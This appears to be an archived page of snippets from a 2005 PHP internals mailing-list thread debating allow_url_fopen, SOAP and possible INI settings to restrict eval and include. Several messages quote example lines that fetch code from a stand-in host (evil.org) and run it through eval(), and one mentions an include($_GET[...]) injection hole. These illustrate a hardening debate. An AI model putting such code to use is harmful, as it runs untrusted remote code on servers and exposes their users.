Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-29 Thread Paul Reinheimer
Since comments were called for I thought I might weigh in with my $0.02cdn. When configuring PHP I want a way to protect myself, and my users from themselves when it comes to doing something silly, I've actually seen include($_GET['function']) in running code, though thankfully never on

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Zeev Suraski
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote: Are you therefore saying SOAP support should be 100% disabled when allow_url_fopen is off? SOAP is not disabled, simply prevented from querying remote data sources directly. What exactly can you do with it other than query remote data sources?

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Ilia Alshanetsky
Zeev Suraski wrote: At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote: Are you therefore saying SOAP support should be 100% disabled when allow_url_fopen is off? SOAP is not disabled, simply prevented from querying remote data sources directly. What exactly can you do with it other than

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread George Schlossnagle
On Jul 28, 2005, at 9:10 AM, Zeev Suraski wrote: At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote: Are you therefore saying SOAP support should be 100% disabled when allow_url_fopen is off? SOAP is not disabled, simply prevented from querying remote data sources directly. What exactly

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread George Schlossnagle
On Jul 28, 2005, at 9:21 AM, Ilia Alshanetsky wrote: Zeev Suraski wrote: At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote: Are you therefore saying SOAP support should be 100% disabled when allow_url_fopen is off? SOAP is not disabled, simply prevented from querying remote data sources

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Zeev Suraski
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote: Zeev Suraski wrote: At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote: Are you therefore saying SOAP support should be 100% disabled when allow_url_fopen is off? SOAP is not disabled, simply prevented from querying remote data sources directly.

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Zeev Suraski
At 04:39 PM 7/28/2005, George Schlossnagle wrote: sure: eval('file_get_contents(http://evil.org;);'); You could say this is just bad policy on the part of code authors, but that's what these options were geared to handle in the first place, right? I don't know, I think that if you aim that

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Ilia Alshanetsky
Zeev Suraski wrote: At 04:52 PM 7/28/2005, Ilia Alshanetsky wrote: It can already be done, disable_functions INI directive. That won't work, eval() is not a function... Ah yes, you're right... I guess we do need another INI setting. Ilia -- PHP Internals - PHP Runtime Development

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Sean Coates
That won't work, eval() is not a function... Ah yes, you're right... I guess we do need another INI setting. Or constructs-that-look-like-functions could be governed by disable_functions (eval, echo).. that would cause other problems (like a disabled return), though. S

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread George Schlossnagle
On Jul 28, 2005, at 9:49 AM, Ilia Alshanetsky wrote: sure: eval('file_get_contents(http://evil.org;);'); Ok, but there is nothing (allow_url_fopen does not work here) preventing me from doing similar via: $fp = fsockopen(evil.org, 80); $fp = fwrite($fp, GET /evil_code.txt

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Ilia Alshanetsky
Zeev Suraski wrote: At 04:43 PM 7/28/2005, Ilia Alshanetsky wrote: Zeev Suraski wrote: 3. Introduce allow_remote_streams (effectively allow_url_fopens renamed, except it doesn't affect include/require) If this option is disabled, would it simply prevent loading URLs via various file

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Ilia Alshanetsky
sure: eval('file_get_contents(http://evil.org;);'); Ok, but there is nothing (allow_url_fopen does not work here) preventing me from doing similar via: $fp = fsockopen(evil.org, 80); $fp = fwrite($fp, GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n); eval(stream_get_contents($fp));

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Mike Bretz
Ilia Alshanetsky wrote: IMHO we should restrict or disabling code to just the include/require constructs, since that is the main cause for concern. Ultimately shy of disabling php's ability to request remote files there is no way to prevent an attacker from fetching remote code and then

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-28 Thread Jason Sweat
On 7/28/05, Sean Coates wrote: That won't work, eval() is not a function... Ah yes, you're right... I guess we do need another INI setting. Or constructs-that-look-like-functions could be governed by disable_functions (eval, echo).. that would cause other problems (like

[PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-27 Thread Sara Golemon
Two answers: (A) I do think an override is a good idea. There may be some cases where extension code may need to hook a wrapper whether allow_url_fopen is enabled or not. Granted the code could temporarily change that value, but that's a hackish approach. (B) I don't think SOAP is one of

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-27 Thread Adam Maccabee Trachtenberg
On Wed, 27 Jul 2005, Sara Golemon wrote: (B) I don't think SOAP is one of those cases. I would be disappointed if SOAP allowed *any* calls to be made when allow_url_fopen is off. I pretty much take it for granted that people are going to need to fetch the WSDL file from a remote location.

Re: [PHP-DEV] Re: SOAP SSL support doesn't work when allow_url_fopen is turned off

2005-07-27 Thread Ilia Alshanetsky
Adam Maccabee Trachtenberg wrote: I pretty much take it for granted that people are going to need to fetch the WSDL file from a remote location. Not to mention do anything useful with it, like run queries :-) Are you therefore saying SOAP support should be 100% disabled when allow_url_fopen